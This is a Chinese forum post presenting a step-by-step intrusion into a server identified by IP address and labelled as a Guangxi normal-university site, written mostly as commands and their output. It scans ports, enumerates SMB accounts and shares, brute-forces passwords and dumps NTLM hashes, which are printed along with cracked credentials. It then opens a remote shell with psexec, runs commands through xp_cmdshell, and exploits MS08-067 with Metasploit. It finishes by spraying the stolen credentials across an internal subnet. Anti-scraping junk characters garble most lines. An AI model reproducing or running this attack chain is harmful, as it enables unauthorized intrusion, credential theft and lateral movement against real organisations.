广西师范网站http://202.103.242.241/
" d4 q- x7 {/ c7 `. b9 x( p; j6 d3 \- m1 v0 D4 V( g
root@bt:~# nmap -sS -sV 202.103.242.241% |$ a+ X6 X+ e/ b
5 d+ u+ w% K6 G3 FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
( G* [% F5 [' o+ t' G& T9 W h
+ C( @8 v3 f0 O* J3 L8 s5 ?6 CNmap scan report for bogon (202.103.242.241); z: A9 D5 i: |) y
* F2 m, a6 p6 e! L7 E% D( Z, ]
Host is up (0.00048s latency).
1 y: u. p$ a8 M7 l6 n2 ^/ W& X1 |
Not shown: 993 closed ports0 j& R* k7 U5 Y0 F$ `
6 h+ U3 q- } UPORT STATE SERVICE VERSION# J) i. T9 C) p6 R/ S7 `: s
4 b9 b$ d4 s# Q% G; u! e- v* U8 B135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)" L% w' l# y1 r9 i3 \
! @0 f+ F, H1 s- u& ~8 @# c- I3 N139/tcp open netbios-ssn- M: O9 @1 D. k2 F& f
3 x5 B) b6 a- ? H" h4 N. }
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
- R- Z* d. g; x$ \! p6 d1 y: r' R+ Y
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
8 l/ h0 `. p& `! X$ D/ i/ p* R7 `1 v
1026/tcp open msrpc Microsoft Windows RPC
`9 a* ~, ^- e5 ^, f8 V
* A+ g! K& L8 X6 `) ?3372/tcp open msdtc?1 ], z0 A4 m |; j' {3 {1 o2 s
# Y( X. e- `; F+ K) J! H+ ]
3389/tcp open ms-term-serv?
4 g! y7 H7 ?8 E) u: F' z
, {) [0 z1 V" ^- p3 q1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : y7 K$ g+ ]8 r! t
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r- Y1 J. f0 o. p! ^# }
7 V) G$ x% p/ w& Y& C: ~3 ^9 C
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions2 ^5 c" e) f3 u1 i5 L; O& w
1 [# {' h1 Q F1 E% {9 P: ]' cSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)$ U* S; T; j$ g- R M7 v
3 w5 A- l& B- ~5 `3 `3 x% x qSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. d# w1 i1 m7 N* {( ?% | X
0 S, t: D" j& Y7 b9 g2 uSF:ptions,6,”hO\n\x000Z”);
" v3 v* P9 f' w5 }! U" _
& k( A1 H. X' b6 c; z) WMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ {- ~3 P3 _4 @6 e. D/ O) S5 t) i0 X K1 P6 K
Service Info: OS: Windows0 f2 S4 l% B9 X8 f* ^# U+ u% X
) ]9 a3 y, k. c3 h5 S' a$ mService detection performed. Please report any incorrect results at http://nmap.org/submit/ .3 i6 y! s' @! G6 s: L; q' K9 X
. B5 `, R3 [5 r3 G( ]
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds% s( c1 f$ ? m
' ~9 s- b ~6 a! M, Y! @$ I0 z X
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
9 T4 i' l& m0 T# K7 l+ O
* [7 K$ ~+ I* ^2 i5 S$ Q8 h: q-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse9 |- M- s5 E& ?
' E- J* T1 q' ]8 J- U" g k-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse0 r; l/ z" v* D; W# w1 ?6 h
) `6 T% d0 s# L- N, W: X3 ?# j' \
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse- j7 d7 \: d0 ?; k& u
9 z* G( m! p9 k& V, L-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse# T! c& @' m0 N: ^# G1 \9 Z
' i- f! P0 S! R5 z! }-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse# d6 y2 T1 f8 q
4 d4 e1 v6 Q$ [% n+ D6 L-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
) S" v1 k0 n+ P3 }- i) T
9 K2 b' S2 ~8 \-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
& w' [. |+ v9 S
3 c. `' o# B ]# c* W-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
" T' L% C+ i6 @% L) B6 }# ?) r& z! ^% e( l0 w0 f C
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse* z5 _7 Y: v. {0 H* R
/ q8 K1 Y8 ~6 y7 Y- |6 U8 t% q* G4 P-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse; t9 q' K o8 V! z: V$ [
8 W* V( x$ j" X [) Y5 I
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse* P8 T4 u! ^ D" `& D4 _- Z
0 n4 l/ i* a y% ]-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" ^- N2 C8 E% X3 a
/ u& k9 U9 Z+ {$ a- Q-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse: D- J( R& t1 j0 I* x
, K" z X4 p' O3 G" o @: k, o-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse5 ~/ n% ?" }% Z$ j1 Z( L
5 T- }) T4 N) m1 `3 Q& b% v
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
% [" x8 T7 f$ ~9 D. M
% \/ A" U/ B3 P& P3 G- b2 broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 6 ^9 ?- e2 _- b& M6 U9 n+ s4 P" g
6 u5 i( d0 p, e* l' K5 ~& s//此乃使用脚本扫描远程机器所存在的账户名# t- i, J; O: q, C9 r
, D# F0 F* T" a4 K P: T/ G9 c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST) z. d- f) C' F6 X& O6 ^
$ ^* U2 i+ f7 S' ]0 H# l" V5 u
Nmap scan report for bogon (202.103.242.241)/ J* x: d* _+ s7 c! e# E. x
- l# f- y2 \. y5 O& C5 W9 W
Host is up (0.00038s latency).1 g3 s+ b5 W' |& s2 B1 v
- o. y1 s5 H _/ [4 [! ]* t5 t
Not shown: 993 closed ports
" h; p5 h& ]3 y/ a9 J3 F5 ?; o3 G6 y% v$ ^0 c4 M$ v
PORT STATE SERVICE1 W' k. w- R2 n; q( g4 i
& |3 a: l. x$ [8 F
135/tcp open msrpc
7 N* h* ]& i* u3 P
; v4 N% x1 e' T139/tcp open netbios-ssn; e1 `( a2 y$ J7 O4 g" v
2 \& w( W5 @4 a- x. ?8 b$ y2 u& i445/tcp open microsoft-ds
' g2 c: U- b* `2 ]$ W" Y2 a' N2 q: I9 Y
1025/tcp open NFS-or-IIS. ?' D- j# V( \2 L! K* n
: p4 G8 z0 M0 L# f; b1026/tcp open LSA-or-nterm
5 A8 L- S) a5 A6 a5 ?" C f! u5 h5 b2 A0 \# z4 e
3372/tcp open msdtc
2 O4 l/ s( J( M, T7 m( P2 W* W+ ]7 X: {3 Z: G; v9 T9 Y9 ~
3389/tcp open ms-term-serv
! ?. S6 I; _8 s) x% q! w5 ]3 F8 `, v. u& {) K2 C& ^' e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ h3 ?! Z) l; k" c0 I* ^1 f$ J( j+ a+ A& Q7 d& _
Host script results:- l6 m) z* |# `0 ]( E
! B6 T: Y* O! M- t( w2 K
| smb-enum-users:
* Z1 G, t q7 p: U" F' ]" S7 i9 d. Z- y6 z7 u* o
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
! T8 |5 t4 A3 k. @# I z8 T. q% ~2 @
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
' a* [* w# q: [8 H* u: q+ D4 `3 S5 W6 K$ C5 b3 f: @% L
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 , ]; u- s) O+ |. C7 q/ {
' ^' q. ]: W+ c! b5 L3 w8 F6 W
//查看共享
) f$ K1 F3 N* w4 ^ V) }9 O$ f8 n8 k' g2 g, J
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST( g5 \5 t' l F" P+ r
, X- Y, f- p) N3 A/ Z8 ^* A
Nmap scan report for bogon (202.103.242.241). X. `' S, U$ x- I: n6 G. e" _
, j% E- B0 Y' L# [7 P4 e0 }* T, aHost is up (0.00035s latency).2 r1 o5 g) q. L4 R/ u6 ]
5 U2 c* C: d/ Q# A5 {3 L' b' UNot shown: 993 closed ports
& x# C; x$ L; E1 ]$ Q2 J$ s4 Q' ^! R
PORT STATE SERVICE
j: Z1 W0 a5 G# s: S% w4 P0 Z2 b$ _, B9 S! r1 b
135/tcp open msrpc
, `/ X* U6 B- U* K
! @0 {5 X# o2 F9 r$ R' P139/tcp open netbios-ssn$ V8 ?4 l. \1 L) t4 S+ g
- D. ]- G; i! d4 }445/tcp open microsoft-ds
! p7 K& q$ D, j+ Z2 L0 n$ J
5 X# m% ]5 h8 j( e, T* T8 n1025/tcp open NFS-or-IIS# F" ` c2 N& F+ v' g
9 s% r0 n; F& o0 D/ f" c1026/tcp open LSA-or-nterm/ Z3 b% f- b( F
% S [ X6 U8 N, [# Z$ [5 d) H3372/tcp open msdtc
4 T! x( Q+ A: }" |) ?+ \7 x! ]$ O( D" c# Q+ H
3389/tcp open ms-term-serv
; n& a1 N. ~, v
/ L! G1 K; [6 a0 hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- _' d. H: y5 {; O- m6 G
- U$ V# ?. p1 ~+ T+ e lHost script results:
& B' v$ {# k4 I0 N( v, A! T: z4 G1 F
& [" {% J* f+ d3 z2 x4 c/ }7 k| smb-enum-shares:
- u0 d f. b4 n3 m* ?0 S; w7 n: @& V- H9 R! R7 s1 R4 g
| ADMIN$
4 O1 Y' b, N% S- C" _. |4 P0 C/ G L0 W5 n7 Q d, M( C
| Anonymous access: <none>. F& ^! S$ S0 I% S$ ~
1 J; ^$ b4 @: N% {$ R2 o
| C$' G- U! t3 F3 e1 y0 W# t
* }+ ^% a/ g" \' Z: v
| Anonymous access: <none>
) v; m5 I" x$ L" ~/ t' E; _
1 C4 L% v- G+ D1 {3 P+ {6 G0 F| IPC$
- S/ `, Z8 q Y& W7 c' K3 {
( y6 c& f: V3 n3 h& L5 H$ l|_ Anonymous access: READ( W) H) t0 T* @. e/ x; h0 ]/ k) k
* x" F) c( S1 Z+ V v0 F
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
. I8 l/ s6 Y6 l9 t! G. U+ u5 A$ J+ L' @/ t( S6 t5 r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
' v; r; y. g% P X9 |; o+ a. Z1 M
//获取用户密码
; o: b5 z9 D% c9 \1 B" M+ a0 ^' D4 }& `% \: u7 ?
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
. I: W& H2 j7 [* w* V0 }+ I
- Z- F. T) m2 P( Z! wNmap scan report for bogon (202.103.242.2418)
5 Y+ _( N) F* _( _% n8 s9 a* {6 o0 {
Host is up (0.00041s latency).
6 p* O6 h$ y2 _% V0 `' A/ _- ~3 ?
Not shown: 993 closed ports
$ _4 a% h9 g, H' _. q' h) k' @4 u' R; c4 i
PORT STATE SERVICE
% ~2 Q% T) A1 n- r5 g+ _: a2 \3 b: m8 D0 G% u X, ?
135/tcp open msrpc
; v' \9 b! J( V; P6 m6 N. F p g/ y3 L7 w) O$ a
139/tcp open netbios-ssn
5 M0 k* ^6 i% p" f: P; J( ]8 k) A+ u) Q% C) G" a0 q
445/tcp open microsoft-ds
. M: Q! y/ I0 C& O" A2 f! Z; J8 l: `7 \/ P/ ]3 B* k; D
1025/tcp open NFS-or-IIS
6 i3 v: d4 Q* }* _ {* v( O1 C0 x+ D; H
1026/tcp open LSA-or-nterm$ ]& c* z" K/ |/ v/ y, Z
& Z/ f$ e. f' {3372/tcp open msdtc4 B5 ?* q) i$ ?! H# _
' w8 R x: [. |3389/tcp open ms-term-serv
, f9 J# W6 K/ U4 b# C. T8 O: a o
2 U. l, m7 A# g: pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 ^- ?) r5 X" s# f t8 t: h7 P: _4 ] l4 C
Host script results:$ W# K8 C& G3 U; `0 W
6 Z# m5 f% M- ^5 }, e) o
| smb-brute:& ]; v8 T8 V i* H1 b2 ]
# S, J5 x9 a2 B6 M% Radministrator:<blank> => Login was successful9 U3 R0 Y5 ~6 u' v* ^( `: j
/ M# u4 @% k; J6 G5 A1 W$ J+ v|_ test:123456 => Login was successful8 x) B& W: i* [# `4 S
9 B/ ^+ j! f- }( {+ ONmap done: 1 IP address (1 host up) scanned in 28.22 seconds+ ]( I; O1 Y" L7 f& i
$ R2 w( T$ n% ~9 `- f: }" g( N
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash" x& b: r: C( D' ]* J
( M4 s5 z$ p: N' |0 ^% g7 |
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data* w8 E! v; X9 Z( D! b5 j& i( f* S
. W+ w6 w9 N9 c
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse4 H' N( y' N6 E+ @8 f! |% Q4 c# i; S
, z$ J3 k1 t6 N$ f2 Mroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1394 s. _' P6 [9 c& k8 X) E8 X& N0 T
, \. ^/ z5 ?/ J) F/ v! q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST! C1 a" u3 W$ t
9 t. @- C( Y# y1 Q6 S6 ]5 Y" j
Nmap scan report for bogon (202.103.242.241)( |5 R# f4 y$ }" c0 q {6 T
4 p/ d6 R; P7 o
Host is up (0.0012s latency).4 v3 T6 [, o* q& B( x
; g) n* q$ v& f6 g4 c& m3 b
PORT STATE SERVICE
, T% s8 S6 `( i, z9 J3 p, X, T3 ^8 X5 {' Y5 G% K
135/tcp open msrpc/ E M1 M8 [: M" M+ F% E
! L- Y4 }$ K, }# x5 e
139/tcp open netbios-ssn
6 [. n- T' _& L5 ^( N7 A
1 \# u; N6 o3 {- @445/tcp open microsoft-ds# b3 l. T( N$ P8 W, O
7 @. [4 \( z( T# AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). n# Z! A+ X$ A0 g$ ~. f+ y$ w
w t$ e% t* `, @7 k6 ]$ N1 @Host script results:
; @ ^* Q# M' E8 A% ]
- e- \3 l' L: N; h& J3 H) _( s4 _| smb-pwdump:. `, a+ p+ I8 z. Y2 N* K
: E* f) V9 n( M0 {( D$ J$ I| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************- `* o) p" l( l- W2 }( t
! g. H# a" Q5 }; J, A0 C
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************- \( n2 k) ]7 c/ R8 q- Y
; W* j3 i% d' B q# B, j% O
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ v; B& a! f2 r% o
% o% s+ |* ?! h$ ~1 L: O|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
' Y; G2 x* D! l& g9 b2 h8 f. G& I. t$ m
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds ~* T1 [( Y5 e7 h
7 p5 a5 k+ L( M) ^
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell8 X8 m6 H, |# F" k2 q
. a6 l$ n: c* j% u* |/ i$ U# t- Y
-p 123456 -e cmd.exe
" p' M) a- z# {! \# s1 O/ c
! V( U0 ]' s+ F. K# o7 HPsExec v1.55 – Execute processes remotely
) C; Y# o2 O+ L4 \8 E, a/ _4 A' z1 Q% `5 B
Copyright (C) 2001-2004 Mark Russinovich. n, F# h/ t3 p. b8 {* ]
# w/ V; x6 u% c7 W9 ?' H
Sysinternals – www.sysinternals.com1 y+ L% k% W) y. H" v( m6 M
{0 @- L, v6 m% v+ Z- j# w9 J7 QMicrosoft Windows 2000 [Version 5.00.2195]. u( p$ }& `5 n* U# Y1 [
2 [4 ~9 }# }, R% l* m8 U3 X3 m& X(C) 版权所有 1985-2000 Microsoft Corp.( l3 f) M% J, m+ [) Q, ?
/ w( P$ r( w0 u: e( F7 eC:\WINNT\system32>ipconfig5 |! D4 _- M( z: s
# @/ Y8 R& k/ M- j! \
Windows 2000 IP Configuration6 \6 z: ~4 d B1 u
( ]% }% v0 z+ h' I7 ]# f Q- p
Ethernet adapter 本地连接:
) |7 w4 w" ]% k3 N6 H& e8 b8 b4 F& g& _
Connection-specific DNS Suffix . :
" n6 S2 r) Z' f! R7 Q' \. R' q3 Y2 A4 V* D# a5 _
IP Address. . . . . . . . . . . . : 202.103.242.241. \/ r$ E# p+ u8 X
7 H/ q8 p. U9 j! Z9 Z3 `8 cSubnet Mask . . . . . . . . . . . : 255.255.255.0
& u' c( r" y E6 d4 m$ G$ t: v, o
3 M, f! F+ {' NDefault Gateway . . . . . . . . . : 202.103.1.1
1 V3 U8 ]6 f: g+ }
" [4 l% Q- W! {1 Q0 a* ?C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令; ~/ M, r# _4 q" b/ K& h- ?7 t
% |+ g% b$ N4 S3 Z2 w% yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
. O- X0 o7 f% l4 X* n7 @% J+ J' H5 l/ a8 P% K
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST2 \9 M) Y, F$ i) [5 q7 K
( K6 {: [: E( g2 ^, mNmap scan report for bogon (202.103.242.241)5 I) P. t" O4 z' J' I
6 h" r* _$ L2 N. fHost is up (0.00046s latency).4 {' t% y3 m: x6 a* Z
5 ^8 \, R: j+ p% q4 u- o
Not shown: 993 closed ports
3 W; T$ `0 m' y( c" |! b
' A9 l; y- k7 i3 v7 h) WPORT STATE SERVICE. \9 `' r* f V! y, C( \/ p F
0 M( m2 P# f7 e& C* Z135/tcp open msrpc
$ m$ s5 K. r3 O/ S6 H8 L7 T* h# W z: I! n) v7 a
139/tcp open netbios-ssn, t( b9 Y, d6 G9 Z, Q7 N0 ?
{9 z' A3 A6 j7 C
445/tcp open microsoft-ds1 I# |& O) d& ^/ E; X
+ g( d4 Y3 b; H7 S: L1025/tcp open NFS-or-IIS
8 k5 n+ e3 `3 b* J1 Y" N. G$ ^
& k, ~. a$ W; ~- _2 G1026/tcp open LSA-or-nterm3 r+ c( R- |/ t! F) s: L% ^
' r1 e3 N$ x2 q2 ?* k6 T$ I% O3372/tcp open msdtc
% j, n# G2 m: [ {4 h J' _9 ]: C- s4 q
3389/tcp open ms-term-serv
0 P" M, U" V/ ]7 D! \" P* @9 w" D: r* q$ o$ g& w0 } e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 b) x& L% @& a6 F$ m( C4 k
3 z7 y4 f! S% H+ ]9 o( j) R2 c& j
Host script results:4 E- S* W6 Q6 M9 ^ F
2 q0 G) y3 }$ `1 y( _- g| smb-check-vulns:$ d5 y) d5 U3 K
& k% ^. _/ J4 a/ b9 @3 _|_ MS08-067: VULNERABLE9 j" V1 @; X8 s! s/ [& H" Z0 R
5 [( m# b/ P. ?8 \* o* d1 |! uNmap done: 1 IP address (1 host up) scanned in 1.43 seconds9 e/ O+ o2 e3 ?, V& M$ }, C
6 m1 h, g0 ] f. I( g3 droot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
" q. ]+ M& a8 c8 P1 {; P' }6 ?6 B2 d' _* i4 F# d5 l# X/ M# ~, b
msf > search ms08: V+ N5 n1 t9 y, o3 s% w
# K# K1 [% c/ N! y
msf > use exploit/windows/smb/ms08_067_netapi
" p& l( Q7 v0 [* W- O
- i/ ]; N7 ~6 w! bmsf exploit(ms08_067_netapi) > show options
; T8 v; u; r7 \9 e% _! r J
* N7 y9 c5 K5 Y' X5 {msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
, b6 g' x" X/ g. ]( R D
+ `' B9 o: p5 R' ~+ Rmsf exploit(ms08_067_netapi) > show payloads
6 u" M4 @, E6 o; b5 V9 a X* Z( V4 e
% {2 Z j' a @8 c/ L9 zmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
R2 f" R' ]% f7 O( p/ w- a; O% Q! q( ?) D. Z! x1 ~
msf exploit(ms08_067_netapi) > exploit' R! i1 Q2 [$ m1 ~
1 K- O/ W9 d/ O/ h0 G
meterpreter >
* K* ^9 }) b% O1 e) \: h: Q9 l' G% m5 m) m7 m
Background session 2? [y/N] (ctrl+z)
/ S- g: `3 Z6 ^& w
) ?, j' j9 G3 emsf exploit(ms08_067_netapi) > sessions -l) h; N- V- Q- h; M8 |0 h
: e( ~! T7 g# H- lroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
/ g; Q# r$ W$ D K- q! J9 n
0 {7 K6 c ~9 ^# ~test; O# J, _$ x; o6 N0 r4 _, k
0 a6 b4 q( l3 i+ aadministrator
! n% Z4 V! {. K7 h$ O
, Q, \* D4 D" T7 D' A$ K/ Wroot@bt:/usr/local/share/nmap/scripts# vim password.txt- x/ N0 z# G/ h& s9 F) o
! O" T! t+ A, n
44EFCE164AB921CAAAD3B435B51404EE
: U0 L/ J- x) p! x; H# D( Q
3 C4 r) h- S/ a- N1 u$ sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
% i' |3 x' a8 @" C6 |7 D
% h6 W2 m" e0 w* [ //利用用户名跟获取的hash尝试对整段内网进行登录& q& Z! U6 G+ B
1 p% P4 G4 t/ ?2 w HNmap scan report for 192.168.1.105
' O: ?% H9 G2 O) P: F: ^9 J
5 \' r9 \3 e" C x/ A, CHost is up (0.00088s latency).
. k, B+ E1 W! U0 y. f( ?
- J3 Z8 a4 d. C; U& LNot shown: 993 closed ports
3 {* P) `7 N; H1 R' D" @; `: W
" \7 P2 ~1 W/ \" I, y n5 n2 S, }PORT STATE SERVICE
+ S8 M( L: v$ E- t, ?- R2 _( D2 E- F2 f+ y6 k
135/tcp open msrpc
W6 e$ A/ u+ K0 p. M% f" g! ^# z6 N$ h! C
139/tcp open netbios-ssn
' `, m- m9 ]9 {5 Y1 O( j: [
, b5 ~! [1 g! o q: E+ V! R1 E" Q445/tcp open microsoft-ds
/ o& c' ]& ]* c; Q( q+ ^9 f/ h; w
w% g* @& L& P e' @' ]5 o1025/tcp open NFS-or-IIS+ W2 c$ z" ~7 T% G. G v+ H' \$ {9 {2 H
& @: k8 L* b6 @/ b
1026/tcp open LSA-or-nterm9 H1 K9 T/ l Z7 e. d8 x
3 k. P( l k. ]/ `- p, ^3372/tcp open msdtc W$ a+ `% i% S' e
; q# Y% D/ I G1 C4 z
3389/tcp open ms-term-serv
q7 {. _& a3 U3 i/ c( n0 ^5 z/ z' ^2 K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 Z4 R9 f/ U# y. p" I
, V' @+ H( _/ d7 X
Host script results:
- s4 W* t6 X0 o: q/ M* m, z3 w+ b% _8 O; S2 f
| smb-brute:
. S, z- Z7 ?0 H; n6 G2 ^- r
* p+ w- P8 w" G1 r|_ administrator:<blank> => Login was successful
' k0 I- ?4 g: _+ q# @7 `
3 a; D& ]% _! l0 s# X( o攻击成功,一个简单的msf+nmap攻击~~·8 x6 r$ M# M/ d3 e8 D3 X
+ @* B0 Y& W* F$ x1 G
|
发表于 2012-12-4 12:46:42
收藏
支持
反对